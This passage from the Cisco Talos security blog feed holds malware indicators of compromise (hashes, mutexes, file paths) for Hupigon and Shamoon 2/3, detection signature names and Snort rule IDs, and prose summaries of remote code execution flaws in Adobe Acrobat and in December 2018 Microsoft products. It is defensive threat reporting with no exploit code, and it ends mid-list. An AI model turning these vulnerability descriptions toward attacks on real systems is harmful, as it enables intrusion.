href="https://3.bp.blogspot.com/-cPATesOIsYk/XBP-SikEZDI/AAAAAAAABTU/QcbicV-UjjE-r-PptFZyhD76h6yyOJUxACLcBGAs/s1600/54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://3.bp.blogspot.com/-cPATesOIsYk/XBP-SikEZDI/AAAAAAAABTU/QcbicV-UjjE-r-PptFZyhD76h6yyOJUxACLcBGAs/s640/54bf05efacb556c7ed106a9b802619b2f038d1e6b8adbcf4c8d632f8531e68be_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-1bXxXprfNac/XBP-Y8BR-_I/AAAAAAAABTY/UKcFBwgIWzYeQHdpuwyB75X790oBwP9-QCLcBGAs/s1600/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://2.bp.blogspot.com/-1bXxXprfNac/XBP-Y8BR-_I/AAAAAAAABTY/UKcFBwgIWzYeQHdpuwyB75X790oBwP9-QCLcBGAs/s640/2759147c5b948b705943cc4dfe7932aaeb14bda833ed00a850d1ee5543bac6c3_umbrella.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-td94ffkczL4/XBP-emybT1I/AAAAAAAABTg/eXhrp1PoqD4kWJ_odv11zU1jjA8EIMsHwCLcBGAs/s1600/02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-td94ffkczL4/XBP-emybT1I/AAAAAAAABTg/eXhrp1PoqD4kWJ_odv11zU1jjA8EIMsHwCLcBGAs/s640/02c58585c45ba7f87a94eb10fda2ad3d1216dae821536c77bd1f53b5b48730cf_malware.png" width="640" /></a></div><br /><br /><h3>PUA.Win.Trojan.Hupigon-6776762-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>Local\MSCTF.Asm.MutexDefault1</li><li>\BaseNamedObjects\ISPWizard Mutex</li><li>ISPWizard Mutex</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat</li><li>%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpsetup.exe</li><li>%System32%\rnaph.dll</li><li>%LocalAppData%\Temp\tmpsetup.exe</li></ul><b>File Hashes</b><br /><ul><li>0d72d9ee3de3e8ac191444390ba097b471e72fe6ff951b8d77f2107486f1310d</li><li>174751136660fe996a57657e8ec2205ad9a5e9efe8eaa5078b714f5fb51cf9a2</li><li>1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9</li><li>4d2719868251d27b80b746161fcb2eb78e5ce1927b10c4da5f782ccc51b619e5</li><li>835a2e9ef6349c641ac1e786aae48338c88e76315a2ce4fd4c43903304984093</li><li>a1a60ca213175febdcc3ff1bc578053c563a6d33c40312f46f3118464e2c9b34</li><li>c6f5fcd39af9fe1a342d5b55b09c74c5cc29c666becdc583098e0a09883491c5</li><li>d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411</li><li>e1d008fcb364fa01413eb0710ec049f74e791b17ae25d8f27fe857a7ff9aa8f9</li><li>f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gzQeTrzD7Bw/XBP-rPrj9dI/AAAAAAAABTs/wAf2mnwS0RkTrJeDSImsy5K4iURQbcCXQCLcBGAs/s1600/d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-gzQeTrzD7Bw/XBP-rPrj9dI/AAAAAAAABTs/wAf2mnwS0RkTrJeDSImsy5K4iURQbcCXQCLcBGAs/s400/d84e292c72cd96b1d4755881bb7c05bc7f013910f5671c606fe66a1c56a85411_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-B_A0XkY2nB4/XBP-xv42quI/AAAAAAAABT0/LO2M1gH-HGUpqbLzsfP6X1ggMR2VmvT8QCLcBGAs/s1600/f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="599" data-original-width="962" height="398" src="https://3.bp.blogspot.com/-B_A0XkY2nB4/XBP-xv42quI/AAAAAAAABT0/LO2M1gH-HGUpqbLzsfP6X1ggMR2VmvT8QCLcBGAs/s640/f094e7eea20b73e4513ed141d82eeb96c8f4ba44373483154719ef9bdef07de4_tg.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-ouF1EGIPQbE/XBP-5lUZfOI/AAAAAAAABT4/mzTF036ndUs49brrpzu6ycUU-MGzVjBMgCLcBGAs/s1600/1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-ouF1EGIPQbE/XBP-5lUZfOI/AAAAAAAABT4/mzTF036ndUs49brrpzu6ycUU-MGzVjBMgCLcBGAs/s640/1edcf0b7e78dd603aaf2900a06bb8f52c38e5648df696caf14f6c39d2d23c4e9_malware.png" width="640" /></a></div><br /><br /><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/A4O1YSiP_AY" height="1" width="1" alt=""/>2018-12-14T14:20:25.240-05:000https://blog.talosintelligence.com/2018/12/threat-roundup-1207-1214.htmlCisco Coverage for Shamoon 2 & 3http://feedproxy.google.com/~r/feedburner/Talos/~3/mzZEuexBotY/shamoon-2.htmlAMPClamAVCoverageSnort Rulesnoreply@blogger.com (Alexander Chiu)Fri, 14 Dec 2018 08:30:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-6596414969477575155<div dir="ltr" style="text-align: left;" trbidi="on"><b>Update Dec. 14, 2018 10:30 CST: Added new Shamoon 3 IOCs</b><br /><div class="p2"><span class="s1"></span><br /></div><div class="p1"><span class="s1">Shamoon is a type of destructive malware that has been previously associated with attacks against various organizations in the oil and gas industry that we've been tracking since 2012. A new variant of this threat, identified as Shamoon 2, has been used against several compromised organizations and institutions. Throughout 2017, Talos observed an increase in Shamoon 2 activity and responded to ensure our customers remained protected.<span class="Apple-converted-space">&nbsp;</span></span></div><div class="p2"><span class="s1"></span><br /></div><div class="p1"><span class="s1">On Dec. 10, Talos observed a new Shamoon 3 variant (</span>c3ab58b3154e5f5101ba74fccfd27a9ab445e41262cdf47e8cc3be7416a5904f) that was uploaded to VirusTotal. While it is unclear where this sample came from, it shares many of the characteristics of the Shamoon 2 variant. Talos once again responded to ensure our customers are protected with all the existing coverage mechanisms. Additionally, Talos will continue to monitor for new developments to ensure our customers remain protected.</div><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><h2>Propagation</h2></div>Shamoon 2 has been observed targeting very specific organizations and propagating within a network via network enumeration and the use of stolen credentials. Some of the credentials are organization specific from individuals or shared accounts. Other credentials are the default accounts of products used by the targeted customers.<br /><a name='more'></a><br /><h2 id="h.wrhqi5bpzu9l">Coverage</h2>Coverage for Shamoon 2 is available through Cisco security products, services, and open source technologies. Note that as this threat evolves, new coverage may be developed and existing coverage adapted or modified. As a result, this post should not be considered authoritative. For the most current information, please refer to your FireSIGHT Management Center or Snort.org.<br /><h3 id="h.yjssgy91vc7n">Snort Rules</h3><ul><li>23893</li><li>23903</li><li>23905-23933</li><li>24127</li><li>40906</li></ul><h3 id="h.wp81wfqpfgrp">ClamAV Signatures</h3><ul><li>Win.Dropper.DistTrack-*</li><li>Win.Trojan.DistTrack.*</li><li>Win.Malware.DistTrack.*</li></ul><h3 id="h.23pv2sjlj8ri">AMP Detection</h3><ul><li>W32.GenericKD:Malwaregen.20c3.1201</li><li>W32.Malwaregen.19nb.1201</li><li>W32.47BB36CD28-95.SBX.TG</li><li>W32.Malwaregen.19nb.1201</li><li>W32.Generic:Malwaregen.20c3.1201</li><li>Win.Malware.DistTrack</li><li>W32.128FA5815C-95.SBX.TG</li><li>W32.C7FC1F9C2B-95.SBX.TG</li><li>W32.EFD2F4C3FE-95.SBX.TG</li><li>W32.010D4517C8-95.SBX.TG</li><li>Win.Malware.DistTrack.Talos</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-b0kvoJncIsE/WJDTeRPhWxI/AAAAAAAAAm0/HaBUf4LAYXcQ7kOuqoJsILYj7PT-jqvngCLcB/s1600/12_58_32.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://1.bp.blogspot.com/-b0kvoJncIsE/WJDTeRPhWxI/AAAAAAAAAm0/HaBUf4LAYXcQ7kOuqoJsILYj7PT-jqvngCLcB/s200/12_58_32.jpg" width="200" /></a> <a href="https://3.bp.blogspot.com/-z5Ki0VU2MK8/WJDTb7zuTaI/AAAAAAAAAms/9vY7ch_dql0uaRmkbemOJwvVu-IYZCbHgCLcB/s1600/12_53_07%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://3.bp.blogspot.com/-z5Ki0VU2MK8/WJDTb7zuTaI/AAAAAAAAAms/9vY7ch_dql0uaRmkbemOJwvVu-IYZCbHgCLcB/s320/12_53_07%25281%2529.jpg" width="200" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-RgRg0AqfdNA/WJDTeY6pyxI/AAAAAAAAAm4/46F8oH5hxDEHwQ0oHHr4Gj_siLOiXWbxACLcB/s1600/12_58_53.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://1.bp.blogspot.com/-RgRg0AqfdNA/WJDTeY6pyxI/AAAAAAAAAm4/46F8oH5hxDEHwQ0oHHr4Gj_siLOiXWbxACLcB/s200/12_58_53.jpg" width="200" /></a> <a href="https://4.bp.blogspot.com/-1Gw4pB_ZuI4/WJDTeIjcHxI/AAAAAAAAAmw/P9tGrR9NNvwze7l9jEP-sf_X9IITZ9lXQCLcB/s1600/01_06_31.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://4.bp.blogspot.com/-1Gw4pB_ZuI4/WJDTeIjcHxI/AAAAAAAAAmw/P9tGrR9NNvwze7l9jEP-sf_X9IITZ9lXQCLcB/s320/01_06_31.jpg" width="200" /></a></div><h3 id="h.um18f9c45wng">&nbsp;</h3><h3 id="h.um18f9c45wng">Other Mitigation Strategies</h3>Recent Shamoon 2 activity serves as a good reminder that users and organizations need to have a comprehensive disaster recovery plan. No one can say for certain if you will be targeted by destructive malware but we can say with 100% certainty that all drives fail. Without a proper system to backup and restore your data, you risk permanently losing your data. Ensuring your assets are properly backed up and can be quickly restored is critical should a system become compromised by Shamoon, ransomware, or other destructive malware and require a complete restoration.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-30f67c6uITw/WJDNmzOBNqI/AAAAAAAAAmc/hinLElV4aY8yhSyj6a2bZLRyUUtVN-ytgCLcB/s1600/image05.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="238" src="https://3.bp.blogspot.com/-30f67c6uITw/WJDNmzOBNqI/AAAAAAAAAmc/hinLElV4aY8yhSyj6a2bZLRyUUtVN-ytgCLcB/s320/image05.png" width="320" /></a></div><br />Advanced Malware Protection (<a href="http://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br /><a href="http://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a> or<a href="http://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"> </a><a href="http://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">WSA</a> web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="http://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />The Network Security protection of<a href="http://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"> </a><a href="http://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html">IPS</a> and<a href="http://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"> </a><a href="http://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html">NGFW</a> have up-to-date signatures to detect malicious network activity by threat actors.<br /><br /><a href="http://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><h3>IOCs</h3><br /><b>Shamoon 2</b><br /><br /><div class="p1"><span class="s1">4919436d87d224f083c77228b48dadfc153ee7ad48dd7d22f0ba0d5090b5cf9b</span></div><div class="p1"><span class="s1">5475f35363e2f4b70d4367554f1691f3f849fb68570be1a580f33f98e7e4df4a</span></div><div class="p1"><span class="s1">01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc</span></div><div class="p1"><span class="s1">c7f937375e8b21dca10ea125e644133de3afc7766a8ca4fc8376470277832d95</span><br /><span class="s1"><br /></span></div><style type="text/css">p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 10.0px Monaco; color: #000000; background-color: #ffffff} span.s1 {font-variant-ligatures: no-common-ligatures} </style> <b>Shamoon 3</b><br /><br /><div class="p1"><span class="s1">c3ab58b3154e5f5101ba74fccfd27a9ab445e41262cdf47e8cc3be7416a5904f</span></div><div class="p1"><span class="s1">bd2097055380b96c62f39e1160d260122551fa50d1eccdc70390958af56ac003</span></div><div class="p1"><span class="s1">0694bdf9f08e4f4a09d13b7b5a68c0148ceb3fcc79442f4db2aa19dd23681afe</span></div><div class="p1"><span class="s1">0975eb436fb4adb9077c8e99ea6d34746807bc83a228b17d321d14dfbbe80b03</span></div><div class="p1"><span class="s1">391e7b90bf3f0bfeb2c2602cc65aa6be4dd1c01374b89c4a48425f2d22fe231c</span></div><div class="p1"><span class="s1">ccb1209122085bed5bded3f923835a65d3cc1071f7e4ad52bc5cf42057dd2150</span></div><div class="p1"><span class="s1">dab3308ab60d0d8acb3611bf364e81b63cfb6b4c1783864ebc515297e2297589</span></div><div class="p1"><span class="s1">ee084f2c6fd2cc16f613fadd712641b5742489ca87851739dc868b976867858f</span></div><div class="p1"><span class="s1">36414012564b88b5a2dcded39fc5ed22301ea2ef2f455bf697fa97a5925cb721</span></div><div class="p1"><span class="s1">101e74ef7a18d3a790f1d30edc7bd9f4ebf0afb2cb85cffcd5710d0a53df77a6</span></div><div class="p1"><span class="s1">4d4531f0372d4364e3d9b7e6ea13abf241bbc4a4b761f8a2aea67428d0de8d83</span></div><style type="text/css">p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 10.0px Monaco; color: #000000; background-color: #ffffff} span.s1 {font-variant-ligatures: no-common-ligatures} </style> </div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/mzZEuexBotY" height="1" width="1" alt=""/>2018-12-14T13:00:13.549-05:000https://blog.talosintelligence.com/2017/01/shamoon-2.htmlVulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerabilityhttp://feedproxy.google.com/~r/feedburner/Talos/~3/NBhTL16UJNQ/vulnerability-spotlight-adobe-acrobat.htmlAdobeAdobe Acrobatvuln devvulnerabilitiesvulnerability spotlightnoreply@blogger.com (Jonathan Munshaw)Tue, 11 Dec 2018 12:54:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-677543578465342980<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAAA8/AcvenjbTaE0jDPaShGdm0JmiiOCoRTs1gCLcBGAs/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAAA8/AcvenjbTaE0jDPaShGdm0JmiiOCoRTs1gCLcBGAs/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" /></a></div><i><br /></i><i>Aleksandar Nikolic of Cisco Talos discovered this vulnerability.</i><br /><h3 style="text-align: left;">Executive summary</h3>Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.<br /><br />In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that <a href="https://helpx.adobe.com/security/products/acrobat/apsb18-41.html">an update</a> is available for affected customers.<br /><a name='more'></a><br /><h3 style="text-align: left;">Vulnerability details</h3><b>Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0704/CVE-2018-19716)</b><br /><br />Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.<br /><br />Read the complete vulnerability advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0704/">here</a> for additional information.<br /><h3 style="text-align: left;">Versions tested</h3>Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.<br /><h3 style="text-align: left;">Coverage</h3><a href="https://helpx.adobe.com/security/products/acrobat/apsb18-41.html" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="251" data-original-width="1250" height="40" src="https://2.bp.blogspot.com/-EOkheMgPJvY/XBAVWvYkmwI/AAAAAAAAE54/b0mZ0zhMTyg4QMyuisGAHNRpIj65Ve-3gCLcBGAs/s200/patch_availability_available.jpg" width="200" /></a><br />The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: <a href="https://snort.org/advisories/649">48293, 48294</a><br /><div><br /></div></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/NBhTL16UJNQ" height="1" width="1" alt=""/>2018-12-13T14:19:42.362-05:000https://blog.talosintelligence.com/2018/12/vulnerability-spotlight-adobe-acrobat.htmlMicrosoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coveragehttp://feedproxy.google.com/~r/feedburner/Talos/~3/ivPs31SzFMM/microsoft-patch-tuesday-december-2018.htmlMicrosoftMicrosoft Patch Tuesdaypatch tuesdaySnortSnort RulesSnort.orgvuln devvulnerabilitiesnoreply@blogger.com (Jonathan Munshaw)Tue, 11 Dec 2018 10:35:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-4221898786857306236<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABE/DRJvFGzVnH8ODP7dMWLdnhgYbZqlF9Z8QCLcBGAs/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://1.bp.blogspot.com/-o-bMM_JQczQ/XBKvF5mhu2I/AAAAAAAAABE/DRJvFGzVnH8ODP7dMWLdnhgYbZqlF9Z8QCLcBGAs/s1600/recurring%2Bblog%2Bimages_patch%2Btuesday.jpg" /></a></div><br />Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 38 vulnerabilities, nine of which are rated “critical” and 29 that are considered “important.” There are no “moderate” or “low” vulnerabilities in this release.<br /><br />The advisories cover bugs in the Chakra scripting engine, several Microsoft Office products and the Microsoft Internet Explorer web browser.<br /><br />For coverage of these vulnerabilities, check out our Snort blog post on <a href="https://blog.snort.org/2018/12/snort-rule-update-for-dec-11-2018.html">this week's rule update</a>.<br /><br /><a name='more'></a><h3 style="text-align: left;">Critical vulnerabilities</h3><br />Microsoft disclosed nine critical vulnerabilities this month, which we will highlight below.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8583">CVE-2018-8583</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8617">CVE-2018-8617</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8618">CVE-2018-8618</a>, <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8624">CVE-2018-8624</a> and C<a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8629">VE-2018-8629</a> are all memory corruption vulnerabilities in the Chakra scripting engine that could allow an attacker to execute code on the victim machine remotely. All of the bugs lie in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these vulnerabilities by tricking a user into visiting a web page using Microsoft Edge, or by tricking them into clicking on specially crafted content on other sites that accept user-created content.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8540">CVE-2018-8540</a> is a remote code injection vulnerability in the Microsoft .NET framework. An attacker can exploit this flaw by passing a specific input to an application utilizing vulnerable .NET methods. If successful, the attacker could take control of an affected system.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8626">CVE-2018-8626</a> is a remote code execution vulnerability that exists in Windows DNS servers when they fail to properly handle requests. An attacker could run arbitrary code on an affected system if they exploit the vulnerability by sending malicious requests to a Windows DNS server. Windows servers that are configured as DNS servers are susceptible to this vulnerability.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8631">CVE-2018-8631</a> is a remote code execution vulnerability in Internet Explorer. The bug lies in the way the web browser accesses objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. If successful, the attacker could execute arbitrary code in the context of the current user.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8634">CVE-2018-8634</a> is a memory corruption vulnerability in the Microsoft Edge that exists when the web browser improperly handles objects in memory. An attacker who successfully exploits this flaw by tricking a user into visiting a malicious, specially crafted web page could gain the ability to execute arbitrary code on the machine in the context of the current user.<br /><h3 style="text-align: left;">Important vulnerabilities</h3>This release also contains 29 important vulnerabilities, eight of which we will highlight below.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8597">CVE-2018-8597</a> and <a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8636">CVE-2018-8636</a> are remote code execution vulnerabilities in Microsoft Excel that exist when the software fails to properly handle objects in memory. An attacker can exploit these bugs by tricking the user into opening a specially crafted Excel file, either via the web or as an email attachment. If successful, the attacker could gain the ability to execute arbitrary code on the system in the context of the current user.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8587">CVE-2018-8587</a> is a remote code execution vulnerability in Microsoft Outlook that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted email attachment while using the Outlook client. If successful, the attacker could use a specially crafted file to perform actions in the security context of the current user. For example, the file could act on behalf of the logged-on user with the same permissions as the current users.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8590">CVE-2018-8590</a> is a remote code execution vulnerability in Microsoft Word that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a malicious, specially crafted Word document, either via email, the web, or another vector.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8619">CVE-2018-8619</a> is a remote code execution vulnerability that exists when the Internet Explorer VBScript execution policy improperly restricts VBScript in certain scenarios. An attacker could use this vulnerability to run arbitrary code with the permissions of the current user. A user could trigger this vulnerability if they visited a specially crafted web page using Internet Explorer.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8625">CVE-2018-8625</a> is a remote code execution vulnerability in the VBScript engine. The vulnerability could corrupt memory in such a way that an attacker could execute code in the context of the current user. An attacker could trigger this flaw by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8628">CVE-2018-8628</a> is a remote code execution vulnerability in Microsoft PowerPoint that lies in the way the software processes objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted, malicious PowerPoint file, which would eventually grant them the ability to execute code remotely in the context of the current user. The Preview Pane is not an attack vector this vulnerability — the user must open the file in PowerPoint.<br /><br /><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8643">CVE-2018-8643</a> is a remote code execution vulnerability that exists in the scripting engine handles objects in memory in Internet Explorer. An attacker could exploit this bug by tricking a user into visiting a specially crafted web page on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. If successful, the attacker could then corrupt memory in such a way that they could execute arbitrary code in the context of the current users.<br /><br />The other important vulnerabilities in this release are:<br /><ul style="text-align: left;"><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8477">CVE-2018-8477</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8514">CVE-2018-8514</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8517">CVE-2018-8517</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8580">CVE-2018-8580</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8595">CVE-2018-8595</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8596">CVE-2018-8596</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8598">CVE-2018-8598</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8599">CVE-2018-8599</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8604">CVE-2018-8604</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8611">CVE-2018-8611</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8612">CVE-2018-8612</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8614">CVE-2018-8614</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8616">CVE-2018-8616</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8621">CVE-2018-8621</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8622">CVE-2018-8622</a></li><li><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8627">CVE-2018-8627</a></li><li><a 